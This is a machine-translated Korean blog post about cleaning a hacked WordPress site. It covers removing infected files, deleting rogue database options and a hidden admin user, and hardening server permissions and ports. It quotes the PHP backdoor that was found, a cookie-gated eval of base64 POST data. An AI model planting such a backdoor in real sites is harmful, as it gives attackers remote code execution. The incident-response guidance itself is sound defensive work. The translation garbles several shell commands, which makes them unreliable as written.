WordPress 악용 - 바이러스 파일, SQL 및 서버 보안을 정리합니다.

당신이이 포스트를 읽기 전에, 당신은 볼 수 여기에 게시뭔가를 이해합니다. :)

여러 블로그 파일에서 찾았습니다. stealthsettings.com, 아래 코드와 유사한 코드로 바이러스의 결과로 의 위업 WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPC위의 파일에 대한 경우 xmlrpc.php 부터 졸리는,에서 GREP 서버는 소스 코드에서 이런 종류의 꽤 많은 것 같습니다.

pppffiuuu

감염된 파일 청소 :

Ooookkkk ...
1. 가장 좋은 방법은 그것을 수행되는 백업그리고 청소 데이터베이스에 있습니다 닦음 파일 WordPress (주의 깊게 확인한 후 wp-config.php 및 wp 플랫폼과 엄격하게 관련되지 않은 파일을 보관할 수 있음) 서버에서 원본 파일을 버전에서 업로드 2.5.1 (이 경우에 및 버전 업그레이드 WP :을) http://wordpress.org/download/ . 당신이 그들의주의 검사가 신뢰하지 않는 경우 테마 파일을 포함하여 닦으십시오.

그것은 영향을받은 것 같고, 블로그에 전에 사용하고 간단하게 테마를 변​​경하지 않은 테마 파일이 문제가 해결되지 않습니다.

./andrea/wp-content/themes/default/index.php:

2. 검색하고 포함 된 모든 파일을 삭제합니다... * _new.php * _old.php * Jpgg * 기후 * Pngg 및 WP-info.txt 파일 (있는 경우)를.

찾기. -이름“* _new.php”
찾기. -이름“* _old.php”
찾기. -이름 "* .jpgg"
찾기. -이름“* _giff”
찾기. -이름“* _pngg”
찾기. -이름 "wp-info.txt"

3. 에 / TMP , 검색과 같은 폴더를 삭제 tmpYwbzT2

SQL 청소 :

1. 표 표 wp_options 확인하고 줄을 삭제 : internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. wp_의 모든 것options, 이동 active_plugins 확장 * _new.php * _old.php, *. jpgg *. 기후, *. pngg 또는 다른 확장이 의심되는 경우, 신중하게 확인 중 하나의 끝 플러그인이있는 경우 및 삭제합니다.

3. 표 wp_users그의 오른쪽에 아무것도 작성하지 않은 사용자, 열이있을 경우, 참조 user_nicename. 이 사용자를 삭제하되 ID 열의 번호를 기억하십시오. 이 사용자는 "WordPress"카 user_login 생성 00에 나타납니다 : 00 : 00 0000-00-00.

4. 테이블로 이동 wp_usermeta 이상 ID를 속하는 모든 행을 삭제합니다.

이 SQL 정리를 완료 한 후 플러그인을 비활성화 한 다음 활성화합니다. (블로그-> 대시 보드-> 플러그인)

보안 서버 :

1. "디렉토리와 파일이 무엇인지 확인쓰기"(chmod 777) 그리고 chmod 더 이상 어떤 수준에서도 글을 쓸 수 없습니다. (chmod 예를 들어 644)

찾을 수 있습니다. - 파마 - 2-LS

2. 파일이 비트가 설정되어 확인할 SUID 또는 SGID . 당신이 사용하지 않는 경우 해당 파일은 그들에 넣어 chmod 0 또는 포함 된 패키지를 제거합니다. 그들이 권한을 실행하기 때문에 그들은 "매우 위험하다그룹"또는"뿌리"일반 사용자 권한으로 해당 파일을 실행할 수는 없습니다.

F-파마 - 04000-LS / 유형을 찾을 수
F-파마 - 02000-LS / 유형을 찾을 수

3. 포트가 열려 무엇인지 확인하고, 사용하지 않는 이들을 닫거나 확보하려고합니다.

NETSTAT-| 그렙-i를 들어

너무 많은. 나는하십시오 일부 블로그는 금지된다 de Google Search 그리고 다른 사람들은 "그는 그들을 잘했다!!!" . 글쎄, 나는 그들을 위해 그것을했을 것입니다 ... 하지만 Google이 차단을 시작하면 어떻게 하시겠습니까? 모든 사이트 형성  SPAM는 와 (트로이 목마를 넣어Trojan.Clicker.HTML) 쿠키에서?

기술 애호가로서, 2006년부터 StealthSettings.com에서 기쁨을 가지고 글을 쓰고 있습니다. macOS, Windows, Linux 등 다양한 운영 체제에 대한 풍부한 경험이 있으며 프로그래밍 언어 및 블로깅 플랫폼 (WordPress)과 같은 분야에도 정통하고 있습니다. 온라인 스토어 (WooCommerce, Magento, PrestaShop)를 포함하여 여러 분야에서 경험이 있습니다.

방법 » 안티 바이러스 및 보안 » WordPress 악용 - 바이러스 파일, SQL 및 서버 보안을 정리합니다.

1에 대한 생각WordPress 악용 – 바이러스 파일 정리, SQL 및 서버 보안.”

코멘트 남김